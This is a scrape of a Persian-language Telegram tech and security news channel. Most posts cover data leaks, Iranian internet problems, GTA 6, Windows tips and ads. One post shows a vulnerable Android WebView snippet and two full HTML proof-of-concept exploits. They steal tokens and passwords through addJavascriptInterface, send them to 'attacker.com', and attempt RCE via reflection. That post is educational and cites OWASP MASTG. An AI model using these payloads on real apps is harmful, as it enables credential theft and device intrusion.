تکنولوژی،خبری،هوش مصنوعی،
166K subscribers
4.11K photos
4.63K videos
683 files
4.36K links


خبری،تکنولوژی،هوش مصنوعی،اینترنت آزاد✅️
🔹فعالیت کانال به دور از هرگونه دسته بندی سیاسی
میباشد.
تبلیغ برای VPN نداریم👋
Download Telegram
افشای ۱۲۴ میلیون پسورد و ایمیل؛ آیا اطلاعات شما هم در خطر است؟

🔹به‌تازگی سرویس مشهور هشدار نشت اطلاعات «Have I Been Pwned» یا به اختصار (HIBP)، مجموعه‌ای جدید شامل ۱۲۴ میلیون پسورد و بیش از ۵۶ میلیون آدرس ایمیل را به پایگاه داده خود اضافه کرده است.
🔹مدیر سرویس HIBP توضیح می‌دهد که این داده‌ها در واقع مجموعه‌ای از گزارش‌های ثبت‌شده توسط بدافزارهای سرقت‌کننده اطلاعات هستند. این برنامه‌های مخرب روی سیستم‌عامل ویندوز و سایر دستگاه‌ها پنهان می‌شوند و پسوردهای ذخیره‌شده، داده‌های مرورگر، کوکی‌ها و توکن‌های دسترسی را اسکن و سرقت می‌کنند.
🔹برای بررسی وضعیت امنیت اطلاعات خود، می‌توانید به سادگی به وب‌سایت HaveIBeenPwned.com مراجعه کنید. این پلتفرم اخیراً این اطلاعات جدید را به پایگاه داده خود اضافه کرده است و شما می‌توانید با جستجوی ایمیل خود، وضعیت آن را به سرعت بررسی کنید.
@ITSecurityComputer
23👍5🥰4
چرا اینترنت ایران پس از بازگشایی همچنان ناپایدار است؟

🔹با گذشت بیش از سه هفته از بازگشایی اینترنت بین‌الملل، کاربران همچنان با کندی، قطعی‌های مکرر و اختلال در دسترسی به سرویس‌های خارجی مواجه‌اند. بررسی‌های فنی نشان می‌دهد مجموعه‌ای از عوامل از جمله محدودیت در پروتکل TCP، اختلال در دیتاسنترها، مدیریت سخت‌گیرانه ترافیک و عدم استفاده از IPv۶، در ناپایداری اینترنت
نقش دارند. /سیتنا
@ITSecurityComputer
👍629👎2
امارات متحده عربی با تصویب قانونی جدید، حداقل سن مجاز برای فعالیت در شبکه‌های اجتماعی را به ۱۵ سال افزایش داد

- امارات نخستین کشور عربی است که چنین محدودیتی را برای کاربران فضای مجازی اعمال می‌کند.
- مصوبه جدید، کودکان زیر ۱۵ سال را از ایجاد یا استفاده از حساب‌های کاربری شخصی در شبکه‌های اجتماعی منع می‌کند.
- قانون مذکور همچنین دسترسی کاربران کم‌سن‌وسال به قابلیت‌های کامل پلتفرم‌های اجتماعی را محدود می‌سازد.

@ITSecurityComputer
👍6630👏10🤬2🤣2🤔1
🛑هکرها به سراغ پرونده‌های پژوهشی Novo Nordisk رفتند؛ اطلاعات مطالعات بالینی در حمله سایبری سرقت شد

شرکت داروسازی Novo Nordisk اعلام کرد در یک حمله سایبری، مهاجمان به بخشی از سامانه‌های داخلی این شرکت دسترسی پیدا کرده و اطلاعات مربوط به برخی مطالعات بالینی را کپی کرده‌اند.
به گفته شرکت، داده‌های سرقت‌شده شامل اطلاعات پژوهشی و برخی مشخصات شرکت‌کنندگان مطالعات بوده، اما نام و هویت مستقیم بیماران افشا نشده است. همچنین فعالیت‌های اصلی شرکت و تولید داروها تحت تأثیر این حادثه قرار نگرفته‌اند.
این رخداد بار دیگر نشان می‌دهد داده‌های پزشکی و پژوهشی به یکی از اهداف ارزشمند مهاجمان سایبری در سراسر جهان تبدیل شده‌اند.


@ITSecurityComputer
16👍6
This media is not supported in your browser
VIEW IN TELEGRAM
🔴اولین تصویر از شهر "وایس سیتی"، شهری که بازی Gta6 تو اون جریان داره.


@ITSecurityComputer
59😍10👎2🥴2👍1
مقایسه پشم ریزون مپ GTA 6 در مقابل 5

واقعا مپ Gta v در برابرش یه شوخیه!!

@ITSecurityComputer
👍115❤‍🔥19👎7🤯43🌚1😴1
خنده دار به نظر میاد ولی پرامپتش :
«این تصاویر مربوط به میوه‌هایی است که قصد خرید آن‌ها را دارم. لطفاً به‌صورت دقیق و حرفه‌ای آن‌ها را از نظر میزان رسیدگی، تازگی، شیرینی احتمالی، کیفیت ظاهری، لکه‌ها، له‌شدگی و نشانه‌های خراب بودن بررسی کن.
در نهایت:
بهترین گزینه برای خرید را مشخص کن
ترتیب کیفیت از بهترین تا ضعیف‌ترین را بنویس
دلیل انتخابت را خیلی کوتاه و واضح توضیح بده
اگر هیچ‌کدام مناسب نیستند، صادقانه بگو و دلیلش را توضیح بده
فرض کن یک کارشناس حرفه‌ای انتخاب میوه هستی و باید بهترین انتخاب را برای یک خرید واقعی انجام بدهی.»


@ITSecurityComputer
🍓45🤣30👍143
⭕️ در زیر یک تکه کد آسیب‌پذیر آورده شده است:
WebView webview = new WebView(this);
WebSettings webSettings = webview.getSettings();
webSettings.setJavaScriptEnabled(true);
webView.addJavascriptInterface(new WebAppInterface(this), "Android");
webView.loadUrl(getIntent().getStringExtra("url"));

کد اکسپلویت کامل
<!DOCTYPE html>
<html>
<head>
    <title>POC - WebView addJavascriptInterface</title>
</head>
<body>
    <h2> Exploiting addJavascriptInterface</h2>
    <div id="result"></div>
   
    <script>
        // مرحله 1: سرقت دیتا از متدهای exposed
        try {
            var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];
            for (var method of methods) {
                try {
                    var data = window.Android[method]();
                    if (data) {
                        document.getElementById('result').innerHTML +=
                            '<p>Stolen: ' + method + ' = ' + data + '</p>';
                        fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
                    }
                } catch(e) {}
            }
        } catch(e) {}
       
        // مرحله 2: RCE (فقط در صورتی که getContext در کلاس جاوا تعریف شده باشه)
        try {
            var context = window.Android.getContext();
            var classLoader = context.getClassLoader();
            var Runtime = classLoader.loadClass('java.lang.Runtime')
                .getMethod('getRuntime', null)
                .invoke(null, null);
            Runtime.exec(['su', '-c', 'id']);
            document.getElementById('result').innerHTML += '<p> RCE Successful!</p>';
        } catch(e) {
            document.getElementById('result').innerHTML +=
                '<p> RCE not possible (no chain method)</p>';
        }
    </script>
</body>
</html>

نسخه ساده‌تر (سرقت دیتا از متود های اکسپوزد)
<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<script>
// سرقت دیتای هر متدی که در کلاس جاوا وجود داره
var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];

for (var method of methods) {
try {
var data = window.Android[method]();
if (data) {
fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
alert('Stolen: ' + data);
}
} catch(e) {}
}
</script>
</body>
</html>

نکته: این POC فرض می‌کنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن.

نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!!

برای مطالعه بیشتر: Owasp MASTG

@ITSecurityComputer
👾214🤯3😱3
🔴 میدل ایست آی : از هوش مصنوعی گروک متعلق به ایلان ماسک برای مشخص کردن 2000 تارگت در حملات اخیر به ایران استفاده شده
البته مشخص نیست که انتخاب مدرسه ی میناب به عنوان هدف هم توسط هوش مصنوعی گراک انجام شده یا نه.

@ITSecurityComputer
🤬139🤣71😱10🫡52🤷‍♂2👍2🔥2🐳2💯1💔1
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از این ویدیو 📈📈📈

اسپویل : با این ترفند هرچی حرف بزنی رو تایپ میکنه، رایگان بدون نصب هیچی

🪽 Fachlich
🍃 @ITSecurityComputer
🤣797👍5
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از اینکه مشخص میشه اصلا برای تبدیل صدا به متن نیازی به گوشی نیست : 📉📉🫪🫨

🪽 Fachlich
🍃 @ITSecurityComputer
🤣778
دیگه برای بستن برنامه‌های هنگ کرده، نیازی به Task Manager نداری حتماً برای شما هم پیش اومده که وسط کار، یه برنامه توی ویندوز قفل می‌کنه و هیچ جوره بسته نمیشه. همیشه مجبور بودیم کلی مسیر بریم، تسک منیجر رو باز کنیم و از اونجا برنامه رو به زور ببندیم (End\ Task). اما توی ویندوز ۱۱ یه قابلیت مخفی وجود داره که این دکمه رو مستقیم میاره روی نوار پایین صفحه (Taskbar) تا فقط با یک کلیک، برنامه ای هنگ کرده رو ببندید

چطوری فعالش کنیم؟
کلیدهای ترکیبی Windows + I رو بزنید تا تنظیمات (Settings) باز بشه.
از منوی سمت چپ وارد بخش System بشید.
بیاید پایین‌تر و گزینه‌ی For Developers (یا در برخی نسخه‌ها Advanced) رو پیدا کنید.
گزینه‌ی End Task رو روشن (On) کنید.
تمام حالا هر وقت برنامه‌ای قفل کرد، کافیه روی آیکونش در پایین صفحه راست‌کلیک کنید و گزینه‌ی End Task رو بزنید.

@ITSecurityComputer
31🤣10👍8❤‍🔥2
🔴 جوون ایرانی با بازی کردن GTA 6 خداحافظی کن.

راکستار : هزینه دیسک بازی GTA 6 حدود 70 تا 100 دلار تخمین زده میشه، یعنی برای داشتن این دیسک باید 11 تا 16 میلیون تومن هزینه کنید.

@ITSecurityComputer
💔156👾16🥱87👎3😴2
🔴 شاید باورتون نشه، ولی به خاطر یه تجمع ساده دانش‌آموزی، تو بعضی از مناطق کشور سرعت اینترنت به‌شدت ضعیف شده.
@ITSecurityComputer
🤣158👍10😢5😍3👎2💔21
این اپ هم کاربردیه و می‌تونه به کارت بیاد می‌تونه برنامه‌های انتخابی رو فریز کنه تا دیگه در پس‌زمینه اجرا نشن. که نتیجه میشه :
رم آزادتر
گوشی خنک‌تر
عملکرد روان‌تر
مصرف باتری کمتر
کاهش مصرف اینترنت پس‌زمینه
رایگان و متن‌باز
بدون تبلیغات

برای اپ‌هایی که کم استفاده می‌کنید، گزینه جالبیه تا منابع گوشی بیهوده مصرف نشن.

لینک دانلود از سایت رسمی

@ITSecurityComputer
👍19❤‍🔥31
لاشیا ابپز شدیم وصل کنید برقو 😐
🤣63😭5🤗4😁1💔1
یک افزونه جالب برای صرفه‌جویی در وقت این افزونه سایت‌ها رو محدود می‌کنه تا بیشتر از زمانی که تعیین کردی نتونی ازشون استفاده کنی. مثلاً می‌ری یوتیوب فقط برای دیدن یه ویدیو اما یهو غرق می‌شی و چند ساعت می‌گذره این افزونه دقیقاً جلوشو می‌گیره

لینک نصب افزونه

@ITSecurityComputer
👍112🤣2
🔻کابوس امنیت در اپل: این آسیب‌پذیری وصله نمی‌شود

🔹گروهی از محققان امنیتی یک کد مخرب عملیاتی با نام usbliter8 را منتشر کرده‌اند که به مهاجم اجازه می‌دهد کدهای دلخواه خود را در سطح SecureROM (حافظه اصلی بوت) تراشه‌های A12 و A13 اپل اجرا کند.

🔹 نکته نگران‌کننده اینجاست که این کد امنیتی در مرحله ساخت تراشه در کارخانه درون سخت‌افزار حک شده است؛ بنابراین هیچ به‌روزرسانی نرم‌افزاری قادر به رفع آن نیست.

🔹البته خطر این حمله برای کاربران عادی، پایین است؛ چرا که مهاجم باید به صورت فیزیکی به دستگاه دسترسی داشته باشد و از ابزارهای خاصی استفاده کند. با این حال، در محیط‌های حساس و سازمانی، این خبر به معنای یک زنگ خطر جدی است.

#آسیب‌پذیری #اپل


@ITSecurityComputer
🤣4911👍2😈1
Forwarded from آکادمی همراه
آخرین فرصت ثبت‌نام در دومین «بوت‌کمپ دواپس (DevOps)» آکادمی همراه اول

امروزه بسیاری از تیم‌های فناوری به دنبال متخصصانی هستند که علاوه بر توسعه نرم‌افزار، توانایی استقرار، مدیریت و نگه‌داری سرویس‌ها را نیز داشته باشند. دواپس (DevOps) یکی از مهارت‌های کلیدی و پرتقاضای بازار کار است که این فاصله را از بین می‌برد.

در این بوت‌کمپ ۱۲ هفته‌ای، با مفاهیم و ابزارهای اصلی دواپس به‌صورت عملی آشنا می‌شوید و نحوه پیاده‌سازی و مدیریت زیرساخت‌های مدرن را یاد می‌گیرید.

💎 آموزش Docker، Kubernetes، CI/CD، Infrastructure as Code و مانیتورینگ سرویس‌ها
💼 امکان کارآموزی در گروه همراه اول
🎓 همراه با گواهینامه آکادمی همراه اول
💳 امکان ثبت‌نام اقساطی
⚠️ ظرفیت محدود

اگر قصد دارید مسیر شغلی خود را در حوزه زیرساخت، کلاد و دواپس آغاز یا تقویت کنید، این آخرین فرصت ثبت‌نام در دوره است.

🌐 پیش‌ثبت‌نام رایگان و مشاهده جزئیات:
🔗 https://l.hamrah.academy/991

⭐️ @Hamrah_Academy | آکادمی همراه اول
👎53🤣1